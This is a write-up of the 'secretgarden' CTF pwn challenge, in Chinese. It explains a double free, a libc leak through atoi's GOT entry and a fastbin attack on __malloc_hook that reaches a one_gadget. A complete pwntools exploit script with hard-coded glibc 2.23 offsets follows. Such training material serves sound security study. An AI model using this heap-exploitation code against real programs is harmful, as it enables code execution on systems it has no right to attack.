hitcontraining_secretgarden

前置知识

  • fastbin attack
  • 堆风水
  • realloc调整栈帧打one_gadget

整体思路

首先大致看下程序,没有 edit,但是在 delete 部分有 double free。clean 我的方法是没用到,下面的删除都不包括这个操作。

首先,申请两个大小为 0x28 的 chunk1、chunk2,然后 delete 1, delete 2, delete 3 来构造 double free。接着申请一个大小为 0x40 的 chunk 3,此时 chunk 3 的指针是 chunk 1。然后再次申请一个大小为 0x28 的 chunk 4,那么 chunk 4 的指针就是 chunk2,chunk4 的内容就是 chunk1。由于 chunk1 是 chunk3 的指针,我们在申请 chunk 4 的时候编辑 chunk 1,就可以编辑 chunk3 的指针了。如此一来我们把 chunk3 的指针中的堆块地址编辑为 atoi 的 got 表地址,然后 show 就可以泄露出 libc 地址。

接下来打 double free malloc_hook 就可以了。

我是用堆风水做的,做完之后看师傅们的 wp 方法都有直接 double free got 表的,但是我做的时候没有看到说是 got 表有 fake chunk 可以用来打 fastbin attack。

exp

from pwn import *
from LibcSearcher import *

# Target binary and the libc build every hard-coded offset below is tied to.
filename = './secretgarden'
local = 1
all_logs = []  # leak_info() appends here; debug() replays the entries.

# Verbose pwntools logging so every send/recv is visible while debugging.
context(log_level='debug')
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')

# Local process when `local` is truthy, otherwise the remote endpoint.
sh = process(filename) if local else remote('node4.buuoj.cn', 26157)

def debug():
    """Replay the recorded leak log, attach gdb to the target, and pause."""
    # Re-emit every entry recorded by leak_info() so the addresses are visible
    # next to the gdb session.
    for entry in all_logs:
        success(entry)
    # pidof() returns a list; the first match is attached to.
    target_pid = util.proc.pidof(sh)[0]
    gdb.attach(target_pid)
    pause()

# Menu prompt shared by every operation.
choice_words = 'Your choice : '

# Menu numbers as printed by the binary.
menu_add = 1
menu_show = 2
menu_del = 3
menu_edit = 4

# Prompts for "add" (option 1). An empty string means the binary prints no
# such prompt and the helper skips that input.
add_index_words = ''
add_size_words = 'Length of the name :'
add_content_words = 'The name of flower :'
add_color_words = 'The color of the flower :'

# Prompts for "show" (option 2); no index prompt exists.
show_index_words = ''

# Prompts for "remove" (option 3).
del_index_words = 'Which flower do you want to remove from the garden:'

# Prompts for "edit" (option 4); left empty, the script never calls clean().
edit_index_words = ''
edit_size_words = ''
edit_content_words = ''

def add(index=-1, size=-1, content='', color=''):
    """Drive menu option 1 (add a flower).

    A prompt is only answered when its prompt string is non-empty, so
    inputs the binary never asks for are skipped. ``content`` goes through
    ``sendafter`` (no trailing newline); the other fields are sent as lines.
    """
    sh.sendlineafter(choice_words, str(menu_add))
    # (prompt, answer, send function) in the order the binary asks for them.
    steps = (
        (add_index_words, str(index), sh.sendlineafter),
        (add_size_words, str(size), sh.sendlineafter),
        (add_content_words, content, sh.sendafter),
        (add_color_words, color, sh.sendlineafter),
    )
    for prompt, answer, send in steps:
        if prompt:
            send(prompt, answer)

def delete(index=-1):
    """Drive menu option 3 (remove a flower) for ``index``."""
    sh.sendlineafter(choice_words, str(menu_del))
    if not del_index_words:
        return
    sh.sendlineafter(del_index_words, str(index))

def show(index=-1):
    """Drive menu option 2 (show). ``index`` is only sent if a prompt exists."""
    sh.sendlineafter(choice_words, str(menu_show))
    if not show_index_words:
        return
    sh.sendlineafter(show_index_words, str(index))

def clean(index=-1, size=-1, content=''):
    """Drive menu option 4 (edit). Not called by the script below.

    Mirrors add(): a prompt is only answered when its prompt string is
    non-empty, and ``content`` is sent without a trailing newline.
    """
    sh.sendlineafter(choice_words, str(menu_edit))
    steps = (
        (edit_index_words, str(index), sh.sendlineafter),
        (edit_size_words, str(size), sh.sendlineafter),
        (edit_content_words, content, sh.sendafter),
    )
    for prompt, answer, send in steps:
        if prompt:
            send(prompt, answer)

def leak_info(name, addr):
    """Log ``addr`` as ``name => 0x...`` and keep it for debug() to replay."""
    entry = f'{name} => {hex(addr)}'
    success(entry)
    all_logs.append(entry)


# Step 1: use the double free plus heap layout to leak a libc address; chunk 0 is not really used
add(size=0x4f0, content='111', color='222') # 0
add(size=0x28, content='111', color='222') # 1
add(size=0x28, content='333', color='444') # 2
# Index 1 is freed twice with index 2 freed in between (see the write-up above).
delete(index=1)
delete(index=2)
delete(index=1)



add(size=0x40, content='aaa', color='bbb') # 3
delete(index=3) # delete here so that the 0x30-size fastbin is restored

payload = p64(1) + p64(elf.got['atoi'])
add(size=0x28, content=payload, color='111') # 4
show()
# Take the 6 address bytes ending in 0x7f and zero-pad to 8 before unpacking.
leak_addr = u64((sh.recvuntil('\x7f')[-6:]).ljust(8, b'\x00'))
leak_info('leak_addr', leak_addr)
# 0x36e80 is the distance from the leaked pointer to the libc base; it is
# specific to the libc build loaded at the top of the script.
libc.address = leak_addr - 0x36e80
leak_info('libc.address', libc.address)

# Offset hard-coded for the same libc build as above.
fake_realloc_chunk = libc.address + 0x3c4aed
add(size=0x68, content='11', color='22') # 5
add(size=0x68, content='11', color='22') # 6

delete(index=5)
delete(index=6)
delete(index=5)

# 0xb
leak_info('fake_realloc_addr', fake_realloc_chunk)
payload = p64(fake_realloc_chunk)
add(size=0x68, content=payload, color='zzz') # 7
add(size=0x68, content='xxx', color='zzz') # 8
add(size=0x68, content='xxx', color='zzz') # 9

# one_gadget offsets for the libc build above; only index 1 is used below.
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

# 0xb bytes of padding (the "0xb" note above), then two 8-byte values.
payload = b'a'*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc'] + 12)
add(size=0x68, content=payload, color='qqq') # 10
# Same prompt string as choice_words.
sh.sendlineafter('Your choice : ', '1')
# sh.interactive()

# Attaches gdb at the end; sh.interactive() above is left commented out.
debug()